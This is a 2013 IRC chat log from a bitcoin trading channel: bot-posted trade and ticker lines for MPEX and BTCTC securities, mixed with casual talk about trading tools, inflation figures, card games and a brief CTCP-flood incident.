22:39:19 *nothing Jan 14 22:40:03 lol Jan 14 22:40:21 i like portrait video. it's like .. it gives the art depth man Jan 14 22:40:43 "Dear Accusation Scam Forum Connoisseurs;" Jan 14 22:40:49 my keyboarding is fail Jan 14 22:45:52 ++gud Jan 14 22:52:33 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [-] Jan 14 23:05:12 jurov: "Does it mean that, for example pyMPEx will come bundled with fall back list of proxies to send requests to in case of mpex.co is unreachable?" I could do that if you wanted Jan 14 23:05:33 i was also thinking of adding the option to specify a keyring to use Jan 14 23:06:04 also, you could do it Jan 14 23:06:15 ;p Jan 14 23:06:46 i know, i want to finish at least something of this i have here first Jan 14 23:09:44 just realized that i added file logging of every command and decrypted output for future reference.. Jan 14 23:09:51 very useful, but never pushed that, shame on me Jan 14 23:10:22 heh, same here, but i've done it in another module Jan 14 23:31:58 This may sound like a naive question, but how would a person go about becoming a bitcoin exchange? Particularly to only process bitcoin transfers? Jan 14 23:33:14 Is the idea to create a network with 6+ other exchanges and submit transaction to them and once at least 6 are confirmed the transaction is complete? Jan 14 23:33:15 only process bitcoin transfers? Everyone can already transfer bitcoins =/ Jan 14 23:33:47 No, bitcoins don't work like that. Jan 14 23:34:08 Namworld: But the idea would be that I want my service to receive the transaction confirmation as quickly as possible. Jan 14 23:34:09 Dishwasha: bitcoin is peer2peer Jan 14 23:34:34 Yeah, I get that. But there's no reason why you can't control which peers you communicate with. Jan 14 23:35:15 But which peers you communicate with doesn't change anything. Jan 14 23:35:25 Unless they form a closed network willingly. Jan 14 23:35:29 But it can change how quickly a transaction takes to process. Jan 14 23:35:41 Namworld: Yes, you can pay for better bandwidth, etc. Jan 14 23:35:50 But then they're excluded from the bitcoin system. **** BEGIN LOGGING AT Tue Jan 15 07:28:26 2013 Jan 15 07:35:31 that dishwasha exchange was... interesting. Jan 15 07:50:08 [MPEX] [O.BTCUSD.P140T] 2 @ 0.01029943 = 0.0206 BTC [-] Jan 15 07:50:11 [MPEX] [O.BTCUSD.P150T] 1 @ 0.06193501 BTC [-] Jan 15 07:50:13 [MPEX] [O.BTCUSD.P130T] 1 @ 0.00800002 BTC [-] Jan 15 07:50:14 [MPEX] [O.BTCUSD.C130T] 1 @ 0.09478131 BTC [-] Jan 15 07:50:16 [MPEX] [O.BTCUSD.C160T] 1 @ 0.00862926 BTC [-] Jan 15 07:50:16 [MPEX] [O.BTCUSD.P160T] 1 @ 0.13193935 BTC [-] Jan 15 07:50:22 [MPEX] [S.MPOE] 5000 @ 0.00064735 = 3.2368 BTC [-] Jan 15 07:50:23 [MPEX] [S.MPOE] 14774 @ 0.00064736 = 9.5641 BTC [+] Jan 15 07:50:25 [MPEX] [S.MPOE] 33107 @ 0.00065772 = 21.7751 BTC [+] Jan 15 07:50:26 [MPEX] [S.MPOE] 25000 @ 0.00065998 = 16.4995 BTC [+] Jan 15 07:50:27 [MPEX] [S.MPOE] 3300 @ 0.00065999 = 2.178 BTC [+] Jan 15 07:50:29 [MPEX] [S.MPOE] 68819 @ 0.00066 = 45.4205 BTC [+] Jan 15 07:51:15 [MPEX] [O.BTCUSD.C060T] 500 @ 0.70576158 = 352.8808 BTC [+] Jan 15 07:51:30 [MPEX] [S.MPOE] 9300 @ 0.00064223 = 5.9727 BTC [-] Jan 15 07:51:58 [MPEX] [O.BTCUSD.P170T] 820 @ 0.29190365 = 239.361 BTC [-] Jan 15 07:51:58 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:51:59 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:07 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:15 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:16 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:17 [MPEX] [O.BTCUSD.P160T] 777 @ 0.22544062 = 175.1674 BTC [+] Jan 15 07:52:24 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:25 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:25 [MPEX] [S.MPOE] 11750 @ 0.00066 = 7.755 BTC [+] Jan 15 07:52:33 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:35 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:35 [MPEX] [O.BTCUSD.P150T] 614 @ 0.16607911 = 101.9726 BTC [+] Jan 15 07:52:43 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:44 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:52:46 fuuuuuuuuuuuuuuuu Jan 15 07:52:52 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:00 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:01 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:05 Ignore on *!*@24.69.202.62 changed. Jan 15 07:53:09 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:10 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:19 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:20 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:28 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:30 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:37 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:45 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:46 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:50 fuuuuuuuuuuuuuuuu SupaDupaJenkins Jan 15 07:53:54 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:53:55 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:54:03 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:54:04 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:54:10 fuck yourself... Jan 15 07:54:13 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:54:15 You are being CTCP flooded from Supa, ignoring *!*@24.69.202.62 Jan 15 07:54:25 [MPEX] [O.BTCUSD.P140T] 563 @ 0.11587618 = 65.2383 BTC [+] Jan 15 08:01:12 so what's new Jan 15 08:04:59 [MPEX] [S.DICE] 1250 @ 0.00464142 = 5.8018 BTC [+] Jan 15 08:05:00 [MPEX] [S.DICE] 500 @ 0.00462545 = 2.3127 BTC [-] Jan 15 08:05:02 [MPEX] [S.DICE] 1377 @ 0.00457353 = 6.2978 BTC [-] Jan 15 08:05:03 [MPEX] [S.DICE] 1303 @ 0.00456874 = 5.9531 BTC [-] Jan 15 08:05:05 [MPEX] [S.DICE] 320 @ 0.0045637 = 1.4604 BTC [-] Jan 15 08:10:53 supa forgot to take the meds again? Jan 15 08:12:51 too much crank Jan 15 08:14:02 :( Jan 15 08:14:12 there should be a bet : does bfl deliver before pirate pays ? Jan 15 08:17:20 [MPEX] [S.DICE] 1800 @ 0.00460592 = 8.2907 BTC [+] Jan 15 08:17:22 [MPEX] [S.DICE] 554 @ 0.00464529 = 2.5735 BTC [+] Jan 15 08:37:43 [MPEX] [S.MPOE] 30000 @ 0.00065999 = 19.7997 BTC [-] Jan 15 08:37:44 [MPEX] [S.MPOE] 3200 @ 0.00066 = 2.112 BTC [+] Jan 15 08:41:50 whose buying supa debt? Jan 15 08:42:16 [BTCTC] [GOLD] 1 @ 1.2225 BTC Jan 15 08:49:54 [MPEX] [S.DICE] 1535 @ 0.00464529 = 7.1305 BTC [+] Jan 15 08:49:56 [MPEX] [S.DICE] 373 @ 0.0046499 = 1.7344 BTC [+] Jan 15 08:54:18 [MPEX] [S.DICE] 1159 @ 0.00459038 = 5.3203 BTC [-] Jan 15 09:03:46 [MPEX] [S.DICE] 4425 @ 0.0046176 = 20.4329 BTC [+] Jan 15 09:17:26 [MPEX] [S.DICE] 5200 @ 0.0046176 = 24.0115 BTC [+] Jan 15 09:22:24 [MPEX] [S.DICE] 1350 @ 0.0046176 = 6.2338 BTC [+] Jan 15 09:26:04 [MPEX] [S.DICE] 477 @ 0.0046499 = 2.218 BTC [+] Jan 15 09:26:04 [MPEX] [S.DICE] 2000 @ 0.00466753 = 9.3351 BTC [+] Jan 15 09:26:06 [MPEX] [S.DICE] 45 @ 0.00467388 = 0.2103 BTC [+] Jan 15 09:31:29 [MPEX] [S.DICE] 1255 @ 0.00467388 = 5.8657 BTC [+] Jan 15 09:31:34 [MPEX] [S.DICE] 2000 @ 0.00467449 = 9.349 BTC [+] Jan 15 09:31:36 [MPEX] [S.DICE] 3061 @ 0.0046745 = 14.3086 BTC [+] Jan 15 09:31:41 [MPEX] [S.DICE] 3557 @ 0.00467895 = 16.643 BTC [+] Jan 15 09:31:43 [MPEX] [S.DICE] 1547 @ 0.00469829 = 7.2683 BTC [+] Jan 15 09:31:45 [MPEX] [S.DICE] 550 @ 0.00470319 = 2.5868 BTC [+] Jan 15 09:31:46 [MPEX] [S.DICE] 312 @ 0.00470361 = 1.4675 BTC [+] Jan 15 09:31:48 [MPEX] [S.DICE] 813 @ 0.00470385 = 3.8242 BTC [+] Jan 15 09:31:49 [MPEX] [S.DICE] 2745 @ 0.00470449 = 12.9138 BTC [+] Jan 15 09:31:52 [MPEX] [S.DICE] 2660 @ 0.00470703 = 12.5207 BTC [+] Jan 15 09:31:54 [MPEX] [S.DICE] 2111 @ 0.00471062 = 9.9441 BTC [+] Jan 15 09:31:55 [MPEX] [S.DICE] 1654 @ 0.00471497 = 7.7986 BTC [+] Jan 15 09:31:56 [MPEX] [S.DICE] 2300 @ 0.00471641 = 10.8477 BTC [+] Jan 15 09:31:58 [MPEX] [S.DICE] 1717 @ 0.00472014 = 8.1045 BTC [+] Jan 15 09:31:59 [MPEX] [S.DICE] 763 @ 0.00473096 = 3.6097 BTC [+] Jan 15 09:32:00 [MPEX] [S.DICE] 1550 @ 0.00473389 = 7.3375 BTC [+] Jan 15 09:32:01 [MPEX] [S.DICE] 4094 @ 0.00473804 = 19.3975 BTC [+] Jan 15 09:32:02 [MPEX] [S.DICE] 3000 @ 0.00473838 = 14.2151 BTC [+] Jan 15 09:32:04 [MPEX] [S.DICE] 3650 @ 0.00474089 = 17.3042 BTC [+] Jan 15 09:32:05 [MPEX] [S.DICE] 8950 @ 0.00474097 = 42.4317 BTC [+] Jan 15 09:32:05 [MPEX] [S.DICE] 1711 @ 0.00474221 = 8.1139 BTC [+] Jan 15 09:32:19 !ticker m s.dice Jan 15 09:32:21 [MPEX:S.DICE] 1D: 0.00449034 / 0.00461379 / 0.00474221 (341542 shares, 1,575.81 BTC), 7D: 0.00449 / 0.00467079 / 0.0048 (2142353 shares, 10,006.48 BTC), 30D: 0.0014 / 0.00356887 / 0.0048 (12139615 shares, 43,324.81 BTC) Jan 15 09:32:24 [MPEX] [S.DICE] 978 @ 0.00467269 = 4.5699 BTC [-] Jan 15 09:36:51 s.dice bonanza Jan 15 09:38:06 crap, i hate it when my ssh sessions timeout Jan 15 09:38:26 Bridge is such a sensational game that I wouldn't mind being in jail if I had three cellmates who were decent players and who were willing to keep the game going twenty-four hours a day. Jan 15 09:38:30 this is true. Jan 15 09:38:36 bridge is the prison killer. Jan 15 09:38:51 well, not thats its a bad thing, but it happens enough to get annoying on this aws shit where im in and out all the time. Jan 15 09:39:25 haha, never played. i like spades, poker and cribbage. Jan 15 09:39:38 lol Jan 15 09:40:03 maybe you should try it when you're old. Jan 15 09:40:05 24/7 same game? LOL, this will become a real hell fast Jan 15 09:40:14 not with bridge. Jan 15 09:40:21 (the quote was from warren buffett btw) Jan 15 09:40:24 yeah, i thought the minimum age was like 200 Jan 15 09:40:40 mod6 the minimum age for men is 50. the maximum age for women is 32. Jan 15 09:40:58 haha Jan 15 09:41:00 werd Jan 15 09:41:06 after that they get too good at it. Jan 15 09:41:19 too much table talk Jan 15 09:41:24 with out the table talk Jan 15 09:41:29 lol Jan 15 09:42:09 [MPEX] [S.DICE] 1848 @ 0.00467269 = 8.6351 BTC [-] Jan 15 09:44:19 [MPEX] [S.DICE] 2000 @ 0.00472961 = 9.4592 BTC [+] Jan 15 09:44:21 [MPEX] [S.DICE] 650 @ 0.00472962 = 3.0743 BTC [+] Jan 15 09:44:33 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.22917485 = 229.1749 BTC [+] Jan 15 09:47:23 "Henderson Brothers, Inc., the specialist in our shares, is the oldest continuing specialist firm on the Exchange; its progenitor, William Thomas Henderson, bought his seat for $500 on September 8, 1861." Jan 15 09:47:32 o fuck yeah. 500 dollars IN 1861! Jan 15 09:47:46 next time anyone whines about "500 dollars" im showing them this. Jan 15 09:48:00 haha. well, that'd be like 50000 now. Jan 15 09:48:16 with 100% devaluation Jan 15 09:48:28 [MPEX] [S.DICE] 700 @ 0.00467269 = 3.2709 BTC [-] Jan 15 09:49:48 actually seats sell for > 1mn these days Jan 15 09:50:08 aah Jan 15 09:52:52 mod6: Total inflation from January 1914 to January 2012 is 2,166.65% Jan 15 09:53:05 lol yikes Jan 15 09:53:16 you have to search for something that has 1860 data too Jan 15 09:55:01 [MPEX] [S.DICE] 1901 @ 0.00472962 = 8.991 BTC [+] Jan 15 09:55:02 [MPEX] [S.DICE] 689 @ 0.00474221 = 3.2674 BTC [+] Jan 15 09:55:04 [MPEX] [S.DICE] 500 @ 0.00474275 = 2.3714 BTC [+] Jan 15 09:55:09 [MPEX] [S.DICE] 2404 @ 0.00474803 = 11.4143 BTC [+] Jan 15 09:55:11 [MPEX] [S.DICE] 1856 @ 0.00475 = 8.816 BTC [+] Jan 15 09:55:28 http://inflationdata.com enjoy Jan 15 09:55:34 nice! Jan 15 09:57:09 in last 12 years USD has lost 33%! Jan 15 09:57:11 i think that's understated. Jan 15 09:57:22 (20.16 ** 1/98) Jan 15 09:57:26 ;;calc (20.16 ** 1/98) Jan 15 09:57:27 0.205714285714 Jan 15 09:57:39 ugh Jan 15 09:57:47 1990-2012 76,14%! Jan 15 09:59:12 look at the inflation for your lifetime ... ouch Jan 15 09:59:52 haha, you gotta go back to 1980 for me Jan 15 09:59:56 ;;calc 1.0313 ** 98 Jan 15 09:59:57 20.4989558215 Jan 15 10:00:03 ok, listen, that number is bs. Jan 15 10:00:08 no way inflation averaged 3% a year. Jan 15 10:00:52 century inflation is more in the 100k to 1mn% range Jan 15 10:03:08 [MPEX] [S.DICE] 1124 @ 0.00467269 = 5.2521 BTC [-] Jan 15 10:03:11 [MPEX] [S.DICE] 576 @ 0.00467146 = 2.6908 BTC [-] Jan 15 10:08:48 [MPEX] [S.DICE] 3450 @ 0.00475 = 16.3875 BTC [+] Jan 15 10:14:08 go argue with that site :) I do not run it Jan 15 10:16:57 [MPEX] [S.DICE] 3724 @ 0.00467146 = 17.3965 BTC [-] Jan 15 10:16:59 [MPEX] [S.DICE] 526 @ 0.00464864 = 2.4452 BTC [-] Jan 15 10:27:39 [MPEX] [S.DICE] 2572 @ 0.00472961 = 12.1646 BTC [+] Jan 15 10:33:47 [MPEX] [S.DICE] 428 @ 0.00472961 = 2.0243 BTC [+] Jan 15 10:33:48 [MPEX] [S.DICE] 2022 @ 0.00474624 = 9.5969 BTC [+] Jan 15 10:37:52 [MPEX] [S.DICE] 883 @ 0.00464865 = 4.1048 BTC [-] Jan 15 10:45:50 [MPEX] [S.DICE] 117 @ 0.00464865 = 0.5439 BTC [-] Jan 15 10:45:52 [MPEX] [S.DICE] 1683 @ 0.00464864 = 7.8237 BTC [-] Jan 15 10:55:19 [MPEX] [S.DICE] 1200 @ 0.00474582 = 5.695 BTC [+] Jan 15 10:55:21 [MPEX] [S.DICE] 2650 @ 0.00474623 = 12.5775 BTC [+] Jan 15 10:57:54 [MPEX] [S.DICE] 1578 @ 0.00464864 = 7.3356 BTC [-] Jan 15 10:57:56 [MPEX] [S.DICE] 422 @ 0.00464694 = 1.961 BTC [-] Jan 15 10:58:03 http://trilema.com/2013/about-trading-and-value/ Jan 15 11:02:04 [MPEX] [S.DICE] 600 @ 0.00474623 = 2.8477 BTC [+] Jan 15 11:15:05 [MPEX] [S.DICE] 310 @ 0.00468133 = 1.4512 BTC [-] Jan 15 11:15:07 [MPEX] [S.DICE] 720 @ 0.00464865 = 3.347 BTC [-] Jan 15 11:22:29 [MPEX] [S.DICE] 1050 @ 0.0046577 = 4.8906 BTC [+] Jan 15 11:51:18 [MPEX] [S.DICE] 2500 @ 0.00472514 = 11.8129 BTC [+] Jan 15 11:51:19 [MPEX] [S.DICE] 62 @ 0.00464694 = 0.2881 BTC [-] Jan 15 11:51:20 [MPEX] [S.DICE] 488 @ 0.00462601 = 2.2575 BTC [-] Jan 15 12:00:28 [MPEX] [S.BBET] 1475 @ 0.0018 = 2.655 BTC [-] Jan 15 12:01:17 [MPEX] [S.DICE] 1300 @ 0.00473225 = 6.1519 BTC [+] Jan 15 12:01:19 [MPEX] [S.DICE] 694 @ 0.00473625 = 3.287 BTC [+] Jan 15 12:01:58 [BTCTC] [BTC-BOND] 2 @ 0.0097 = 0.0194 BTC [-] Jan 15 12:04:03 [MPEX] [S.DICE] 3600 @ 0.00462602 = 16.6537 BTC [-] Jan 15 12:11:03 [MPEX] [S.DICE] 500 @ 0.00469986 = 2.3499 BTC [+] Jan 15 12:11:04 [MPEX] [S.DICE] 306 @ 0.00473625 = 1.4493 BTC [+] Jan 15 12:11:06 [MPEX] [S.DICE] 964 @ 0.00473626 = 4.5658 BTC [+] Jan 15 12:11:07 [MPEX] [S.DICE] 1678 @ 0.00474733 = 7.966 BTC [+] Jan 15 12:11:08 [MPEX] [S.DICE] 6852 @ 0.00475 = 32.547 BTC [+] Jan 15 12:12:38 [MPEX] [S.DICE] 1950 @ 0.00475 = 9.2625 BTC [+] Jan 15 12:17:41 [MPEX] [S.DICE] 1400 @ 0.00462602 = 6.4764 BTC [-] Jan 15 12:17:42 [MPEX] [S.DICE] 50 @ 0.00462601 = 0.2313 BTC [-] Jan 15 12:38:42 You've got 3 Jan 15 12:38:42 new messages from girls. Jan 15 12:38:42 Please follow link below to check your inbox: Jan 15 12:38:46 (c) 2013. RealDiatingSystem. Jan 15 12:39:37 [MPEX] [S.DICE] 1550 @ 0.00470296 = 7.2896 BTC [+] Jan 15 12:39:42 Is it a dieting system or a dating system? Jan 15 12:42:59 right ? Jan 15 12:43:04 i guess it must be the result of a merger. Jan 15 12:43:12 a real diating system, does both. Jan 15 12:53:04 [BTCTC] [COGNITIVE] 1 @ 0.459 BTC [+] Jan 15 12:54:18 [MPEX] [S.DICE] 1700 @ 0.00464849 = 7.9024 BTC [-] Jan 15 12:57:03 [MPEX] [S.MPOE] 1500 @ 0.00065999 = 0.99 BTC [-] Jan 15 12:59:00 [MPEX] [S.DICE] 594 @ 0.00470296 = 2.7936 BTC [+] Jan 15 12:59:02 [MPEX] [S.DICE] 1606 @ 0.00475 = 7.6285 BTC [+] Jan 15 12:59:13 [MPEX] [S.BBET] 500 @ 0.0018 = 0.9 BTC [-] Jan 15 13:02:35 [MPEX] [S.DICE] 2600 @ 0.00475 = 12.35 BTC [+] Jan 15 13:10:36 [MPEX] [S.DICE] 1200 @ 0.00470168 = 5.642 BTC [-] Jan 15 13:14:42 [MPEX] [S.DICE] 504 @ 0.00475 = 2.394 BTC [+] Jan 15 13:14:44 [MPEX] [S.DICE] 3596 @ 0.00475035 = 17.0823 BTC [+] Jan 15 13:22:24 [MPEX] [S.DICE] 2050 @ 0.00474024 = 9.7175 BTC [-] Jan 15 13:22:27 [MPEX] [S.DICE] 1685 @ 0.00475035 = 8.0043 BTC [+] Jan 15 13:25:19 [MPEX] [S.DICE] 1250 @ 0.00470168 = 5.8771 BTC [-] Jan 15 13:25:20 [MPEX] [S.DICE] 2450 @ 0.00469426 = 11.5009 BTC [-] Jan 15 13:25:21 [MPEX] [S.DICE] 700 @ 0.00466466 = 3.2653 BTC [-] Jan 15 13:26:42 [BTCTC] [ESECURITYSABTC] 15 @ 0.79 = 11.85 BTC [-] Jan 15 13:27:45 [MPEX] [S.DICE] 2000 @ 0.00465654 = 9.3131 BTC [-] Jan 15 13:28:47 [MPEX] [S.DICE] 250 @ 0.00464849 = 1.1621 BTC [-] Jan 15 13:28:49 [MPEX] [S.DICE] 1987 @ 0.00462601 = 9.1919 BTC [-] Jan 15 13:30:44 Hooray, my order got filled on coinbr Jan 15 13:33:49 [MPEX] [S.DICE] 3200 @ 0.00465654 = 14.9009 BTC [+] Jan 15 13:36:18 [MPEX] [S.DICE] 586 @ 0.00465654 = 2.7287 BTC [+] Jan 15 13:44:05 [MPEX] [S.DICE] 349 @ 0.00465654 = 1.6251 BTC [+] Jan 15 13:46:01 [MPEX] [S.DICE] 651 @ 0.00472886 = 3.0785 BTC [+] Jan 15 13:58:03 [MPEX] [S.DICE] 1775 @ 0.00462601 = 8.2112 BTC [-] Jan 15 13:58:05 [MPEX] [S.DICE] 1425 @ 0.00462128 = 6.5853 BTC [-] Jan 15 14:05:20 pirate uses coinbr, who wudda say :P Jan 15 14:07:28 [MPEX] [S.DICE] 500 @ 0.00462803 = 2.314 BTC [+] Jan 15 14:09:52 I wish, then I'd spend more than 3 btc :P Jan 15 14:12:00 might invest more if mpex stocks don't implode or somebody hacks coinbr into oblivion by next month Jan 15 14:14:38 [BTCTC] [ESECURITYSABTC] 2 @ 0.79 = 1.58 BTC [-] Jan 15 14:16:47 [MPEX] [S.DICE] 1825 @ 0.00462128 = 8.4338 BTC [-] Jan 15 14:17:49 [BTCTC] [ESECURITYSABTC] 10 @ 0.8399 = 8.399 BTC [+] Jan 15 14:18:08 [BTCTC] [ESECURITYSABTC] 2 @ 0.8399 = 1.6798 BTC [+] Jan 15 14:19:11 Bad idea since they're bought back at about 0.7 BTC value Jan 15 14:19:20 [MPEX] [S.DICE] 1475 @ 0.00461846 = 6.8122 BTC [-] Jan 15 14:19:22 [MPEX] [S.DICE] 842 @ 0.00462803 = 3.8968 BTC [+] Jan 15 14:19:38 So if neotrix buys them back within 10~ weeks, those people are screwed Jan 15 14:20:52 [MPEX] [S.DICE] 1407 @ 0.00462803 = 6.5116 BTC [+] Jan 15 14:23:55 [MPEX] [S.DICE] 2200 @ 0.00471664 = 10.3766 BTC [+] Jan 15 14:23:57 [MPEX] [S.DICE] 400 @ 0.00475035 = 1.9001 BTC [+] Jan 15 14:32:50 [MPEX] [S.DICE] 2918 @ 0.00475035 = 13.8615 BTC [+] Jan 15 14:34:59 [MPEX] [S.DICE] 2701 @ 0.00475035 = 12.8307 BTC [+] Jan 15 14:35:06 [MPEX] [S.DICE] 422 @ 0.00475112 = 2.005 BTC [+] Jan 15 14:35:13 ;;ticker Jan 15 14:35:13 BTCUSD ticker | Best bid: 14.20001, Best ask: 14.24998, Bid-ask spread: 0.04997, Last trade: 14.20001, 24 hour volume: 46208.66766734, 24 hour low: 13.99178, 24 hour high: 14.47899, 24 hour vwap: 14.20296 Jan 15 14:35:26 [BTCTC] [GSDPT] 1 @ 0.007 BTC [+] Jan 15 14:37:22 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Jan 15 14:37:50 [MPEX] [S.DICE] 650 @ 0.00475 = 3.0875 BTC [-] Jan 15 14:38:20 !ticker s.dice Jan 15 14:38:20 Provide exchange and ticker. Jan 15 14:38:25 !ticker m s.dice Jan 15 14:38:26 [MPEX:S.DICE] 1D: 0.00449034 / 0.00463912 / 0.00475112 (403600 shares, 1,872.35 BTC), 7D: 0.00449 / 0.00467182 / 0.0048 (2204987 shares, 10,301.32 BTC), 30D: 0.0014 / 0.00358016 / 0.0048 (12255882 shares, 43,878.11 BTC) Jan 15 14:38:39 !ticker m s.bbet Jan 15 14:38:40 [MPEX:S.BBET] 1D: 0.0018 / 0.0018 / 0.0018 (18545 shares, 33.38 BTC), 7D: 0.000337 / 0.00077036 / 0.0035 (2164911 shares, 1,667.76 BTC), 30D: 0.000337 / 0.00077036 / 0.0035 (2164911 shares, 1,667.76 BTC) Jan 15 14:39:13 Bugpowder: can you /msg assbot ? Jan 15 14:40:03 [BTCTC] [GSDPT] 3 @ 0.007 = 0.021 BTC [+] Jan 15 14:41:12 doesn't everyone want to know the latest :-P Jan 15 14:43:40 [MPEX] [S.DICE] 3450 @ 0.00475 = 16.3875 BTC [-] Jan 15 14:46:28 [MPEX] [S.DICE] 646 @ 0.00471499 = 3.0459 BTC [-] Jan 15 14:46:30 [MPEX] [S.DICE] 554 @ 0.0046176 = 2.5582 BTC [-] Jan 15 15:02:24 [MPEX] [S.DICE] 250 @ 0.004749 = 1.1873 BTC [+] Jan 15 15:02:26 [MPEX] [S.DICE] 3700 @ 0.00475 = 17.575 BTC [+] Jan 15 15:04:57 [MPEX] [S.MPOE] 26550 @ 0.00065957 = 17.5116 BTC [-] Jan 15 15:05:04 [MPEX] [S.MPOE] 2150 @ 0.00065459 = 1.4074 BTC [-] Jan 15 15:15:00 [MPEX] [S.DICE] 1118 @ 0.00474416 = 5.304 BTC [-] Jan 15 15:15:02 [MPEX] [S.DICE] 2132 @ 0.00475 = 10.127 BTC [+] Jan 15 15:31:46 [BTCTC] [ESECURITYSABTC] 10 @ 0.79 = 7.9 BTC [-] Jan 15 15:38:23 [MPEX] [S.DICE] 2300 @ 0.0047083 = 10.8291 BTC [-] Jan 15 15:38:25 [MPEX] [S.DICE] 1355 @ 0.00475 = 6.4363 BTC [+] Jan 15 15:42:26 [MPEX] [S.DICE] 2619 @ 0.00475 = 12.4403 BTC [+] Jan 15 15:55:38 [MPEX] [S.DICE] 1000 @ 0.00468567 = 4.6857 BTC [-] Jan 15 15:55:40 [MPEX] [S.DICE] 1219 @ 0.00462626 = 5.6394 BTC [-] Jan 15 16:02:04 [MPEX] [S.DICE] 3000 @ 0.00471633 = 14.149 BTC [+] Jan 15 16:06:59 [MPEX] [S.DICE] 1281 @ 0.00462626 = 5.9262 BTC [-] Jan 15 16:07:00 [MPEX] [S.DICE] 219 @ 0.00462 = 1.0118 BTC [-] Jan 15 16:13:34 [MPEX] [S.DICE] 1640 @ 0.00468138 = 7.6775 BTC [+] Jan 15 16:16:27 [MPEX] [S.DICE] 1700 @ 0.00471633 = 8.0178 BTC [+] Jan 15 16:17:26 [MPEX] [S.MPOE] 17680 @ 0.00065999 = 11.6686 BTC [+] Jan 15 16:30:53 S.BBET bids are up to .0015 Jan 15 16:30:54 heh Jan 15 16:31:03 I wonder if anyone will bite Jan 15 16:33:09 !ticker m S.BBET Jan 15 16:33:10 [MPEX:S.BBET] 1D: 0.0018 / 0.0018 / 0.0018 (18545 shares, 33.38 BTC), 7D: 0.000337 / 0.00077036 / 0.0035 (2164911 shares, 1,667.76 BTC), 30D: 0.000337 / 0.00077036 / 0.0035 (2164911 shares, 1,667.76 BTC) Jan 15 16:34:04 [HAVELOCK] [SDICE] 18 @ 0.48 = 8.64 BTC [-] Jan 15 16:36:21 [MPEX] [S.DICE] 2260 @ 0.00469924 = 10.6203 BTC [-] Jan 15 16:42:26 so let's say I wanted to buy a few thousand shares of S.BBET Jan 15 16:42:31 where would i start Jan 15 16:43:29 If you don't want to spend more than 100BTC on the venture I'd recommend the mpex broker Jan 15 16:43:31 https://coinbr.com/ref?c=W3XWfHQCws Jan 15 16:44:01 type this into your terminal ./mpex.py 'BUY|S.BBET|21142|175000' Jan 15 16:44:33 http://demonocracy.info/infographics/usa/derivatives/bank_exposure.html Jan 15 16:46:08 Ha, I haven't seen that infographic in ages Jan 15 16:46:09 >100BTC Jan 15 16:46:14 not enough for a pizza Jan 15 16:46:57 you need at least 10k bitcoin for pizza iirc Jan 15 16:47:47 $140k? but I like my pizza without gold and diamonds Jan 15 16:59:05 [MPEX] [S.DICE] 650 @ 0.00462633 = 3.0071 BTC [-] Jan 15 16:59:17 [MPEX] [S.DICE] 1950 @ 0.00462633 = 9.0213 BTC [-] Jan 15 16:59:19 [MPEX] [S.DICE] 40 @ 0.00463293 = 0.1853 BTC [+] Jan 15 17:00:18 http://spectrum.ieee.org/telecom/internet/ripple-credit-system-could-help-or-harm-bitcoin Jan 15 17:01:14 [HAVELOCK] [SDICE] 10 @ 0.48 = 4.8 BTC [-] Jan 15 17:02:24 *hanbot* hi Jan 15 17:03:55 [MPEX] [S.DICE] 393 @ 0.0046823 = 1.8401 BTC [+] Jan 15 17:05:48 i'm so on the fence with ripple Jan 15 17:06:07 no comment. i lose all visionary-ness on ripple Jan 15 17:06:36 unsure if good or bad Jan 15 17:07:27 i agree Jan 15 17:07:37 paralyzing Jan 15 17:07:41 is a better term Jan 15 17:14:59 assbot, bitbet and the rest of the world will return when the hdd od the server is changed, thanks for your patience Jan 15 17:33:34 [HAVELOCK] [SDICE] 10 @ 0.48 = 4.8 BTC [-] Jan 15 17:33:56 [MPEX] [S.DICE] 331 @ 0.0046339 = 1.5338 BTC [-] Jan 15 17:33:58 [MPEX] [S.DICE] 500 @ 0.00466725 = 2.3336 BTC [+] Jan 15 17:34:00 [MPEX] [S.DICE] 2002 @ 0.00467104 = 9.3514 BTC [+] Jan 15 17:42:27 kakobrekla: assbot is down? Jan 15 17:42:47 !ticker not anymore Jan 15 17:42:48 Have you got any tobacco? Jan 15 17:43:57 i have wacky tobaccy Jan 15 17:47:27 [MPEX] [S.DICE] 181 @ 0.00462 = 0.8362 BTC [-] Jan 15 17:47:29 [MPEX] [S.DICE] 2600 @ 0.00461845 = 12.008 BTC [-] Jan 15 